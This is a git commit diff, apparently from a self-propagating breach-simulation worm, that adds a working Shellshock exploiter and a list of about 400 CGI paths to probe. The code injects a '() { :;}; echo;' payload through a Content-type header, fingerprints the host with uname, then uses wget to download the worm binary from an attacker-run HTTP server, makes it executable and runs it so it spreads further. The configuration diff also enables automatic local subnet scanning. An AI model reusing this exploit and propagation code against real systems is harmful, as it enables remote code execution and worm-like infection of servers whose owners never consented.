Issue 23 - Added shellshock exploit.

This commit is contained in:
daniel goldberg 2016-08-29 12:09:46 +03:00
parent bdde8dfeed
commit a322a619cb
5 changed files with 623 additions and 5 deletions

View File

@ -1,7 +1,7 @@
import os import os
import sys import sys
from network.range import FixedRange, RelativeRange, ClassCRange from network.range import FixedRange, RelativeRange, ClassCRange
from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter from exploit import WmiExploiter, Ms08_067_Exploiter, SmbExploiter, RdpExploiter, SSHExploiter, ShellShockExploiter
from network import TcpScanner, PingScanner, SMBFinger, SSHFinger,HTTPFinger from network import TcpScanner, PingScanner, SMBFinger, SSHFinger,HTTPFinger
from abc import ABCMeta from abc import ABCMeta
import uuid import uuid
@ -134,7 +134,9 @@ class Configuration(object):
scanner_class = TcpScanner scanner_class = TcpScanner
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger] finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, SSHExploiter] exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits
SSHExploiter, ShellShockExploiter #Linux
]
# how many victims to look for in a single scan iteration # how many victims to look for in a single scan iteration
victims_max_find = 14 victims_max_find = 14
@ -165,11 +167,11 @@ class Configuration(object):
########################### ###########################
# Auto detect and scan local subnets # Auto detect and scan local subnets
local_network_scan = False local_network_scan = True
range_class = FixedRange range_class = FixedRange
range_size = 1 range_size = 1
range_fixed = ["88.198.218.174","212.73.212.91" ] range_fixed = ['']
# TCP Scanner # TCP Scanner
HTTP_PORTS = [80, 8080, 443, HTTP_PORTS = [80, 8080, 443,

View File

@ -18,3 +18,4 @@ from wmiexec import WmiExploiter
from smbexec import SmbExploiter from smbexec import SmbExploiter
from rdpgrinder import RdpExploiter from rdpgrinder import RdpExploiter
from sshexec import SSHExploiter from sshexec import SSHExploiter
from shellshock import ShellShockExploiter

View File

@ -0,0 +1,208 @@
# Implementation is based on shellshock script provided https://github.com/nccgroup/shocker/blob/master/shocker.py
import logging
from random import choice
import string
from tools import build_monkey_commandline
from exploit import HostExploiter
from model.host import VictimHost
from shellshock_resources import CGI_FILES
from model import MONKEY_ARG
from exploit.tools import get_target_monkey, HTTPTools, report_failed_login
import grequests
import requests
__author__ = 'danielg'
LOG = logging.getLogger(__name__)
TIMEOUT = 2
DOWNLOAD_TIMEOUT = 60
TEST_COMMAND = '/bin/uname -a'
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder
class ShellShockExploiter(HostExploiter):
_target_os_type = ['linux']
_attacks = {
"Content-type": "() { :;}; echo; "
}
def __init__(self):
self._config = __import__('config').WormConfiguration
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.success_flag = ''.join(
choice(string.ascii_uppercase + string.digits
) for _ in range(20))
def exploit_host(self, host, depth=-1, src_path=None):
assert isinstance(host, VictimHost)
# start by picking ports
valid_ports = [(port, host.services['tcp-' + str(port)][1]) for port in self.HTTP if
'tcp-' + str(port) in host.services]
http_ports = [port[0] for port in valid_ports if not port[1]]
https_ports = [port[0] for port in valid_ports if port[1]]
LOG.info(
'Scanning %s, ports [%s] for vulnerable CGI pages' % (
host, ",".join([str(port[0]) for port in valid_ports]))
)
attackable_urls = []
# now for each port we want to check the entire URL list
for port in http_ports:
urls = self.check_urls(host.ip_addr, port)
attackable_urls.extend(urls)
for port in https_ports:
urls = self.check_urls(host.ip_addr, port, is_https=True)
attackable_urls.extend(urls)
# now for each URl we want to try and see if it's attackable
exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls]
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
# we want to report all vulnerable URLs even if we didn't succeed
# let's overload this
[self.report_vuln_shellshock(host, url) for url in exploitable_urls]
# now try URLs until we install something on victim
for _, url, header, exploit in exploitable_urls:
LOG.info("Trying to attack host %s with %s URL" % (host, url))
# same attack script as sshexec
# for any failure, quit and don't try other URLs
if not host.os.get('type'):
try:
uname_os_attack = exploit + '/bin/uname -o'
uname_os = self.attack_page(url, header, uname_os_attack)
if 'linux' in uname_os:
host.os['type'] = 'linux'
else:
LOG.info("SSH Skipping unknown os: %s", uname_os)
return False
except Exception, exc:
LOG.debug("Error running uname os commad on victim %r: (%s)", host, exc)
return False
if not host.os.get('machine'):
try:
uname_machine_attack = exploit + '/bin/uname -m'
uname_machine = self.attack_page(url, header, uname_machine_attack)
if '' != uname_machine:
host.os['machine'] = uname_machine.lower().strip()
except Exception, exc:
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
return False
src_path = src_path or get_target_monkey(host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
return False
http_path, http_thread = HTTPTools.create_transfer(host, src_path)
if not http_path:
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
return False
# copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux
download_command = '/usr/bin/wget %s -O %s;' % (
http_path, dropper_target_path_linux)
download_and_run = exploit + download_command
resp = self.attack_page(url, header, download_and_run)
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue
# turn the monkey into an executable
chmod = '/bin/chmod +x %s' % dropper_target_path_linux
run_path = exploit + chmod
self.attack_page(url, header, run_path)
# run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(host, depth - 1) + ' & '
run_path = exploit + cmdline
resp = self.attack_page(url, header, run_path)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, host, cmdline)
if not (self.check_remote_file_exists(url,header,exploit,self._config.monkey_log_path_linux)):
LOG.info("Failed running the monkey, log file does not exist")
continue
return True
@classmethod
def check_remote_file_exists(cls, url, header, exploit, file_path):
"""
Checks if a remote file exists and returns the content if so
file_path should be fully qualified
"""
cmdline = '/usr/bin/head -c 4 %s' % file_path
run_path = exploit + cmdline
resp = cls.attack_page(url, header, run_path)
if resp:
LOG.info("File %s exists on remote host" % file_path)
return resp
def attempt_exploit(self, url, attacks=_attacks):
# Flag used to identify whether the exploit has successfully caused the
# server to return a useful response
LOG.debug("Attack Flag is: %s" % self.success_flag)
LOG.debug("Trying exploit for %s" % url)
for header, exploit in attacks.iteritems():
attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND
result = self.attack_page(url, header, attack)
if self.success_flag in result:
LOG.info("URL %s looks vulnerable" % url)
return True, url, header, exploit
else:
LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
return False,
@staticmethod
def attack_page(url, header, attack):
result = ""
try:
LOG.debug("Header is: %s" % header)
LOG.debug("Attack is: %s" % attack)
r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT)
result = r.content
return result
except requests.exceptions.RequestException as exc:
LOG.debug("Failed to run, exception %s" % exc)
return result
@staticmethod
def check_urls(host, port, is_https=False, url_list=CGI_FILES):
"""
Checks if which urls exist
:return: Sequence of URLs to try and attack
"""
attack_path = 'http://'
if is_https:
attack_path = 'https://'
attack_path = attack_path + str(host) + ":" + str(port)
attack_urls = [attack_path + url for url in url_list]
reqs = (grequests.head(u, verify=False, timeout=TIMEOUT) for u in attack_urls)
resps = grequests.map(reqs, size=15)
valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]
return urls
@staticmethod
def report_vuln_shellshock(host,url):
from control import ControlClient
ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__,
'exploiter': ShellShockExploiter.__name__,
'url': url})

View File

@ -0,0 +1,406 @@
# resource for shellshock attack
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
CGI_FILES = (r'/',
r'/admin.cgi',
r'/administrator.cgi',
r'/agora.cgi',
r'/aktivate/cgi-bin/catgy.cgi',
r'/analyse.cgi',
r'/apps/web/vs_diag.cgi',
r'/axis-cgi/buffer/command.cgi',
r'/b2-include/b2edit.showposts.php',
r'/bandwidth/index.cgi',
r'/bigconf.cgi',
r'/cartcart.cgi',
r'/cart.cgi',
r'/ccbill/whereami.cgi',
r'/cgi-bin/14all-1.1.cgi',
r'/cgi-bin/14all.cgi',
r'/cgi-bin/a1disp3.cgi',
r'/cgi-bin/a1stats/a1disp3.cgi',
r'/cgi-bin/a1stats/a1disp4.cgi',
r'/cgi-bin/addbanner.cgi',
r'/cgi-bin/add_ftp.cgi',
r'/cgi-bin/adduser.cgi',
r'/cgi-bin/admin/admin.cgi',
r'/cgi-bin/admin.cgi',
r'/cgi-bin/admin/getparam.cgi',
r'/cgi-bin/adminhot.cgi',
r'/cgi-bin/admin.pl',
r'/cgi-bin/admin/setup.cgi',
r'/cgi-bin/adminwww.cgi',
r'/cgi-bin/af.cgi',
r'/cgi-bin/aglimpse.cgi',
r'/cgi-bin/alienform.cgi',
r'/cgi-bin/AnyBoard.cgi',
r'/cgi-bin/architext_query.cgi',
r'/cgi-bin/astrocam.cgi',
r'/cgi-bin/AT-admin.cgi',
r'/cgi-bin/AT-generate.cgi',
r'/cgi-bin/auction/auction.cgi',
r'/cgi-bin/auktion.cgi',
r'/cgi-bin/ax-admin.cgi',
r'/cgi-bin/ax.cgi',
r'/cgi-bin/axs.cgi',
r'/cgi-bin/badmin.cgi',
r'/cgi-bin/banner.cgi',
r'/cgi-bin/bannereditor.cgi',
r'/cgi-bin/bb-ack.sh',
r'/cgi-bin/bb-histlog.sh',
r'/cgi-bin/bb-hist.sh',
r'/cgi-bin/bb-hostsvc.sh',
r'/cgi-bin/bb-replog.sh',
r'/cgi-bin/bb-rep.sh',
r'/cgi-bin/bbs_forum.cgi',
r'/cgi-bin/bigconf.cgi',
r'/cgi-bin/bizdb1-search.cgi',
r'/cgi-bin/blog/mt-check.cgi',
r'/cgi-bin/blog/mt-load.cgi',
r'/cgi-bin/bnbform.cgi',
r'/cgi-bin/book.cgi',
r'/cgi-bin/boozt/admin/index.cgi',
r'/cgi-bin/bsguest.cgi',
r'/cgi-bin/bslist.cgi',
r'/cgi-bin/build.cgi',
r'/cgi-bin/bulk/bulk.cgi',
r'/cgi-bin/cached_feed.cgi',
r'/cgi-bin/cachemgr.cgi',
r'/cgi-bin/calendar/index.cgi',
r'/cgi-bin/cartmanager.cgi',
r'/cgi-bin/cbmc/forums.cgi',
r'/cgi-bin/ccvsblame.cgi',
r'/cgi-bin/c_download.cgi',
r'/cgi-bin/cgforum.cgi',
r'/cgi-bin/.cgi',
r'/cgi-bin/cgi_process',
r'/cgi-bin/classified.cgi',
r'/cgi-bin/classifieds.cgi',
r'/cgi-bin/classifieds/classifieds.cgi',
r'/cgi-bin/classifieds/index.cgi',
r'/cgi-bin/.cobalt/alert/service.cgi',
r'/cgi-bin/.cobalt/message/message.cgi',
r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi',
r'/cgi-bin/commandit.cgi',
r'/cgi-bin/commerce.cgi',
r'/cgi-bin/common/listrec.pl',
r'/cgi-bin/compatible.cgi',
r'/cgi-bin/Count.cgi',
r'/cgi-bin/csChatRBox.cgi',
r'/cgi-bin/csGuestBook.cgi',
r'/cgi-bin/csLiveSupport.cgi',
r'/cgi-bin/CSMailto.cgi',
r'/cgi-bin/CSMailto/CSMailto.cgi',
r'/cgi-bin/csNews.cgi',
r'/cgi-bin/csNewsPro.cgi',
r'/cgi-bin/csPassword.cgi',
r'/cgi-bin/csPassword/csPassword.cgi',
r'/cgi-bin/csSearch.cgi',
r'/cgi-bin/csv_db.cgi',
r'/cgi-bin/cvsblame.cgi',
r'/cgi-bin/cvslog.cgi',
r'/cgi-bin/cvsquery.cgi',
r'/cgi-bin/cvsqueryform.cgi',
r'/cgi-bin/day5datacopier.cgi',
r'/cgi-bin/day5datanotifier.cgi',
r'/cgi-bin/db_manager.cgi',
r'/cgi-bin/dbman/db.cgi',
r'/cgi-bin/dcforum.cgi',
r'/cgi-bin/dcshop.cgi',
r'/cgi-bin/dfire.cgi',
r'/cgi-bin/diagnose.cgi',
r'/cgi-bin/dig.cgi',
r'/cgi-bin/directorypro.cgi',
r'/cgi-bin/download.cgi',
r'/cgi-bin/e87_Ba79yo87.cgi',
r'/cgi-bin/emu/html/emumail.cgi',
r'/cgi-bin/emumail.cgi',
r'/cgi-bin/emumail/emumail.cgi',
r'/cgi-bin/enter.cgi',
r'/cgi-bin/environ.cgi',
r'/cgi-bin/ezadmin.cgi',
r'/cgi-bin/ezboard.cgi',
r'/cgi-bin/ezman.cgi',
r'/cgi-bin/ezshopper2/loadpage.cgi',
r'/cgi-bin/ezshopper3/loadpage.cgi',
r'/cgi-bin/ezshopper/loadpage.cgi',
r'/cgi-bin/ezshopper/search.cgi',
r'/cgi-bin/faqmanager.cgi',
r'/cgi-bin/FileSeek2.cgi',
r'/cgi-bin/FileSeek.cgi',
r'/cgi-bin/finger.cgi',
r'/cgi-bin/flexform.cgi',
r'/cgi-bin/fom.cgi',
r'/cgi-bin/fom/fom.cgi',
r'/cgi-bin/FormHandler.cgi',
r'/cgi-bin/FormMail.cgi',
r'/cgi-bin/gbadmin.cgi',
r'/cgi-bin/gbook/gbook.cgi',
r'/cgi-bin/generate.cgi',
r'/cgi-bin/getdoc.cgi',
r'/cgi-bin/gH.cgi',
r'/cgi-bin/gm-authors.cgi',
r'/cgi-bin/gm.cgi',
r'/cgi-bin/gm-cplog.cgi',
r'/cgi-bin/guestbook.cgi',
r'/cgi-bin/handler',
r'/cgi-bin/handler.cgi',
r'/cgi-bin/handler/netsonar',
r'/cgi-bin/hitview.cgi',
r'/cgi-bin/hsx.cgi',
r'/cgi-bin/html2chtml.cgi',
r'/cgi-bin/html2wml.cgi',
r'/cgi-bin/htsearch.cgi',
r'/cgi-bin/hw.sh', # testing
r'/cgi-bin/icat',
r'/cgi-bin/if/admin/nph-build.cgi',
r'/cgi-bin/ikonboard/help.cgi',
r'/cgi-bin/ImageFolio/admin/admin.cgi',
r'/cgi-bin/imageFolio.cgi',
r'/cgi-bin/index.cgi',
r'/cgi-bin/infosrch.cgi',
r'/cgi-bin/jammail.pl',
r'/cgi-bin/journal.cgi',
r'/cgi-bin/lastlines.cgi',
r'/cgi-bin/loadpage.cgi',
r'/cgi-bin/login.cgi',
r'/cgi-bin/logit.cgi',
r'/cgi-bin/log-reader.cgi',
r'/cgi-bin/lookwho.cgi',
r'/cgi-bin/lwgate.cgi',
r'/cgi-bin/MachineInfo',
r'/cgi-bin/MachineInfo',
r'/cgi-bin/magiccard.cgi',
r'/cgi-bin/mail/emumail.cgi',
r'/cgi-bin/maillist.cgi',
r'/cgi-bin/mailnews.cgi',
r'/cgi-bin/mail/nph-mr.cgi',
r'/cgi-bin/main.cgi',
r'/cgi-bin/main_menu.pl',
r'/cgi-bin/man.sh',
r'/cgi-bin/mini_logger.cgi',
r'/cgi-bin/mmstdod.cgi',
r'/cgi-bin/moin.cgi',
r'/cgi-bin/mojo/mojo.cgi',
r'/cgi-bin/mrtg.cgi',
r'/cgi-bin/mt.cgi',
r'/cgi-bin/mt/mt.cgi',
r'/cgi-bin/mt/mt-check.cgi',
r'/cgi-bin/mt/mt-load.cgi',
r'/cgi-bin/mt-static/mt-check.cgi',
r'/cgi-bin/mt-static/mt-load.cgi',
r'/cgi-bin/musicqueue.cgi',
r'/cgi-bin/myguestbook.cgi',
r'/cgi-bin/.namazu.cgi',
r'/cgi-bin/nbmember.cgi',
r'/cgi-bin/netauth.cgi',
r'/cgi-bin/netpad.cgi',
r'/cgi-bin/newsdesk.cgi',
r'/cgi-bin/nlog-smb.cgi',
r'/cgi-bin/nph-emumail.cgi',
r'/cgi-bin/nph-exploitscanget.cgi',
r'/cgi-bin/nph-publish.cgi',
r'/cgi-bin/nph-test.cgi',
r'/cgi-bin/pagelog.cgi',
r'/cgi-bin/pbcgi.cgi',
r'/cgi-bin/perlshop.cgi',
r'/cgi-bin/pfdispaly.cgi',
r'/cgi-bin/pfdisplay.cgi',
r'/cgi-bin/phf.cgi',
r'/cgi-bin/photo/manage.cgi',
r'/cgi-bin/photo/protected/manage.cgi',
r'/cgi-bin/php-cgi',
r'/cgi-bin/php.cgi',
r'/cgi-bin/php.fcgi',
r'/cgi-bin/ping.sh',
r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
r'/cgi-bin/pollssi.cgi',
r'/cgi-bin/postcards.cgi',
r'/cgi-bin/powerup/r.cgi',
r'/cgi-bin/printenv',
r'/cgi-bin/probecontrol.cgi',
r'/cgi-bin/profile.cgi',
r'/cgi-bin/publisher/search.cgi',
r'/cgi-bin/quickstore.cgi',
r'/cgi-bin/quizme.cgi',
r'/cgi-bin/ratlog.cgi',
r'/cgi-bin/r.cgi',
r'/cgi-bin/register.cgi',
r'/cgi-bin/replicator/webpage.cgi/',
r'/cgi-bin/responder.cgi',
r'/cgi-bin/robadmin.cgi',
r'/cgi-bin/robpoll.cgi',
r'/cgi-bin/rtpd.cgi',
r'/cgi-bin/sbcgi/sitebuilder.cgi',
r'/cgi-bin/scoadminreg.cgi',
r'/cgi-bin-sdb/printenv',
r'/cgi-bin/sdbsearch.cgi',
r'/cgi-bin/search',
r'/cgi-bin/search.cgi',
r'/cgi-bin/search/search.cgi',
r'/cgi-bin/sendform.cgi',
r'/cgi-bin/shop.cgi',
r'/cgi-bin/shopper.cgi',
r'/cgi-bin/shopplus.cgi',
r'/cgi-bin/showcheckins.cgi',
r'/cgi-bin/simplestguest.cgi',
r'/cgi-bin/simplestmail.cgi',
r'/cgi-bin/smartsearch.cgi',
r'/cgi-bin/smartsearch/smartsearch.cgi',
r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/sojourn.cgi',
r'/cgi-bin/spin_client.cgi',
r'/cgi-bin/start.cgi',
r'/cgi-bin/status',
r'/cgi-bin/status_cgi',
r'/cgi-bin/store/agora.cgi',
r'/cgi-bin/store.cgi',
r'/cgi-bin/store/index.cgi',
r'/cgi-bin/survey.cgi',
r'/cgi-bin/sync.cgi',
r'/cgi-bin/talkback.cgi',
r'/cgi-bin/technote/main.cgi',
r'/cgi-bin/test2.pl',
r'/cgi-bin/test-cgi',
r'/cgi-bin/test.cgi',
r'/cgi-bin/testing_whatever',
r'/cgi-bin/test/test.cgi',
r'/cgi-bin/tidfinder.cgi',
r'/cgi-bin/tigvote.cgi',
r'/cgi-bin/title.cgi',
r'/cgi-bin/top.cgi',
r'/cgi-bin/traffic.cgi',
r'/cgi-bin/troops.cgi',
r'/cgi-bin/ttawebtop.cgi/',
r'/cgi-bin/ultraboard.cgi',
r'/cgi-bin/upload.cgi',
r'/cgi-bin/urlcount.cgi',
r'/cgi-bin/viewcvs.cgi',
r'/cgi-bin/view_help.cgi',
r'/cgi-bin/viralator.cgi',
r'/cgi-bin/virgil.cgi',
r'/cgi-bin/vote.cgi',
r'/cgi-bin/vpasswd.cgi',
r'/cgi-bin/way-board.cgi',
r'/cgi-bin/way-board/way-board.cgi',
r'/cgi-bin/webbbs.cgi',
r'/cgi-bin/webcart/webcart.cgi',
r'/cgi-bin/webdist.cgi',
r'/cgi-bin/webif.cgi',
r'/cgi-bin/webmail/html/emumail.cgi',
r'/cgi-bin/webmap.cgi',
r'/cgi-bin/webspirs.cgi',
r'/cgi-bin/Web_Store/web_store.cgi',
r'/cgi-bin/whois.cgi',
r'/cgi-bin/whois_raw.cgi',
r'/cgi-bin/whois/whois.cgi',
r'/cgi-bin/wrap',
r'/cgi-bin/wrap.cgi',
r'/cgi-bin/wwwboard.cgi.cgi',
r'/cgi-bin/YaBB/YaBB.cgi',
r'/cgi-bin/zml.cgi',
r'/cgi-mod/index.cgi',
r'/cgis/wwwboard/wwwboard.cgi',
r'/cgi-sys/addalink.cgi',
r'/cgi-sys/defaultwebpage.cgi',
r'/cgi-sys/domainredirect.cgi',
r'/cgi-sys/entropybanner.cgi',
r'/cgi-sys/entropysearch.cgi',
r'/cgi-sys/FormMail-clone.cgi',
r'/cgi-sys/helpdesk.cgi',
r'/cgi-sys/mchat.cgi',
r'/cgi-sys/randhtml.cgi',
r'/cgi-sys/realhelpdesk.cgi',
r'/cgi-sys/realsignup.cgi',
r'/cgi-sys/signup.cgi',
r'/connector.cgi',
r'/cp/rac/nsManager.cgi',
r'/create_release.sh',
r'/CSNews.cgi',
r'/csPassword.cgi',
r'/dcadmin.cgi',
r'/dcboard.cgi',
r'/dcforum.cgi',
r'/dcforum/dcforum.cgi',
r'/debuff.cgi',
r'/debug.cgi',
r'/details.cgi',
r'/edittag/edittag.cgi',
r'/emumail.cgi',
r'/enter_buff.cgi',
r'/enter_bug.cgi',
r'/ez2000/ezadmin.cgi',
r'/ez2000/ezboard.cgi',
r'/ez2000/ezman.cgi',
r'/fcgi-bin/echo',
r'/fcgi-bin/echo',
r'/fcgi-bin/echo2',
r'/fcgi-bin/echo2',
r'/Gozila.cgi',
r'/hitmatic/analyse.cgi',
r'/hp_docs/cgi-bin/index.cgi',
r'/html/cgi-bin/cgicso',
r'/html/cgi-bin/cgicso',
r'/index.cgi',
r'/info.cgi',
r'/infosrch.cgi',
r'/login.cgi',
r'/mailview.cgi',
r'/main.cgi',
r'/megabook/admin.cgi',
r'/ministats/admin.cgi',
r'/mods/apage/apage.cgi',
r'/_mt/mt.cgi',
r'/musicqueue.cgi',
r'/ncbook.cgi',
r'/newpro.cgi',
r'/newsletter.sh',
r'/oem_webstage/cgi-bin/oemapp_cgi',
r'/page.cgi',
r'/parse_xml.cgi',
r'/photodata/manage.cgi',
r'/photo/manage.cgi',
r'/print.cgi',
r'/process_buff.cgi',
r'/process_bug.cgi',
r'/pub/english.cgi',
r'/quikmail/nph-emumail.cgi',
r'/quikstore.cgi',
r'/reviews/newpro.cgi',
r'/ROADS/cgi-bin/search.pl',
r'/sample01.cgi',
r'/sample02.cgi',
r'/sample03.cgi',
r'/sample04.cgi',
r'/sampleposteddata.cgi',
r'/scancfg.cgi',
r'/scancfg.cgi',
r'/servers/link.cgi',
r'/setpasswd.cgi',
r'/SetSecurity.shm',
r'/shop/member_html.cgi',
r'/shop/normal_html.cgi',
r'/site_searcher.cgi',
r'/siteUserMod.cgi',
r'/submit.cgi',
r'/technote/print.cgi',
r'/template.cgi',
r'/test.cgi',
r'/ucsm/isSamInstalled.cgi',
r'/upload.cgi',
r'/userreg.cgi',
r'/users/scripts/submit.cgi',
r'/vood/cgi-bin/vood_view.cgi',
r'/Web_Store/web_store.cgi',
r'/webtools/bonsai/ccvsblame.cgi',
r'/webtools/bonsai/cvsblame.cgi',
r'/webtools/bonsai/cvslog.cgi',
r'/webtools/bonsai/cvsquery.cgi',
r'/webtools/bonsai/cvsqueryform.cgi',
r'/webtools/bonsai/showcheckins.cgi',
r'/wwwadmin.cgi',
r'/wwwboard.cgi',
r'/wwwboard/wwwboard.cgi')

View File

@ -12,4 +12,5 @@ psutil
PyInstaller PyInstaller
ecdsa ecdsa
netifaces netifaces
requests requests
grequests